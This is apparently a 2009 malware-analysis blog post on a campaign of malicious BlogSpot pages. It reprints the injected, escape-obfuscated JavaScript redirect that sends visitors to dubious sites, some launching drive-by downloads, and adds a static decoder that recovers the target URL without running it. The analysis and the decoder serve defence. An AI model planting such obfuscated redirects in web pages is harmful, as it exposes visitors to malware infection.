October 10, 2009
A new malware campaign is currently abusing BlogSpot. I'll call it the "Mutu" campaign from the text that is found on the malicious pages. I have so far detected almost 400 blogs that are actively involved in the campaign.
A malicious blog looks like the following picture. Note that the actual text, layout, and color themes may vary across different pages.
A malicious page contains a script tag similar to the following:
<script language="javascript">
location.href='\u0068\u0074\u0074\u0070\u003a\u002f\u002f'
+ unescape('%77%77%77%2e%78')+unescape('%78%78%6f%64')
+'\u006e\u006f\u006b\u006c\u0061\u0073'+'sniki'
+unescape('%2e%63%6f%6d%2f')+unescape('%3f%61%64')
+unescape('%76%3d%67%61%72')+'bunov'+''
</script>
The script causes the victim's browser to fetch a malicious (or at least dubious) page from one of several domains. These are the domains that are currently being redirected to:
Some of these domains appear to be selling various items (cell phones, drugs). However, others (at least afsharteam1.com) launch drive-by-download attacks. As a result, malware with limited and generic detection on VirusTotal gets downloaded and launched on the victim's machine.
For more details, see the Wepawet report for bertilladingman36429.blogspot.com, a blog that redirects to drive-by attacks.
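To recover the destination of a script like the one shown above without ever executing it, here is an added static decoder (my own example, not code from the original post). It assumes the redirect keeps the same shape as the sample: a `location.href` assignment built from plain string literals with `\u`/`\x` escapes and `unescape('%..')` calls joined by `+`; anything else yields null.

```javascript
// Static decoder for the obfuscated BlogSpot redirect: rebuilds the target URL
// from the concatenation expression without running any page JavaScript.

// Decode JavaScript string-literal escapes (\uXXXX, \xXX) in a raw literal body.
function decodeJsLiteral(body) {
  return body
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Reimplement the legacy unescape(): %uXXXX and %XX sequences.
function decodeUnescapeArg(arg) {
  return arg
    .replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Pull out the expression assigned to location.href and decode each operand
// in order. Returns null when the script does not match the expected shape.
function decodeRedirectTarget(scriptText) {
  const m = /location\.href\s*=\s*([^;]*?)(?:;|<\/script>|$)/i.exec(scriptText);
  if (!m) return null;
  // Operands are either unescape('...') calls or bare single-quoted literals.
  const tokenRe = /unescape\(\s*'([^']*)'\s*\)|'([^']*)'/g;
  let url = '';
  let tok;
  while ((tok = tokenRe.exec(m[1])) !== null) {
    url += tok[1] !== undefined ? decodeUnescapeArg(tok[1]) : decodeJsLiteral(tok[2]);
  }
  return url;
}

// Cheap triage check for page scans: a location.href assignment whose value is
// assembled from escaped fragments is worth a closer look.
function isSuspiciousRedirect(scriptText) {
  return /location\.href\s*=/.test(scriptText) &&
         /unescape\(|\\u[0-9a-fA-F]{4}/.test(scriptText);
}

// The script tag from the campaign page, embedded here as sample input.
const MUTU_SAMPLE = String.raw`<script language="javascript">
location.href='\u0068\u0074\u0074\u0070\u003a\u002f\u002f'
+ unescape('%77%77%77%2e%78')+unescape('%78%78%6f%64')
+'\u006e\u006f\u006b\u006c\u0061\u0073'+'sniki'
+unescape('%2e%63%6f%6d%2f')+unescape('%3f%61%64')
+unescape('%76%3d%67%61%72')+'bunov'+''
</script>`;

console.log(isSuspiciousRedirect(MUTU_SAMPLE), decodeRedirectTarget(MUTU_SAMPLE));
```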